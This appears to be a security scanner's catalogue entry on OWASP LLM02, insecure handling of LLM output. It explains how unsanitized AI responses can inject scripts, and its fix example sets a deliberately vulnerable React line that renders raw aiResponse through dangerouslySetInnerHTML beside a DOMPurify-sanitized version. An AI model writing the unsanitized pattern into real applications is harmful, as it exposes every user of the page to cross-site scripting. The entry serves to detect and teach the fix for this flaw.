HIGHCWE-116AI Security
OWASP LLM02 — Insecure Output Handling
Description
LLM-generated output is rendered without sanitization, potentially allowing XSS or code execution if the LLM produces malicious output.
How Vezraa Detects It
We check how your app renders LLM output — if it uses dangerouslySetInnerHTML or innerHTML on AI-generated content, we flag it.
Real-World Impact
A compromised or malicious LLM response can inject scripts into your page, leading to XSS in all users' browsers.
Fix Example
// BAD — render raw HTML
<div dangerouslySetInnerHTML={{ __html: aiResponse }} />
// GOOD — sanitize first
import DOMPurify from 'dompurify';
<div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(aiResponse) }} />Affected Stacks
All LLM appsNext.jsReact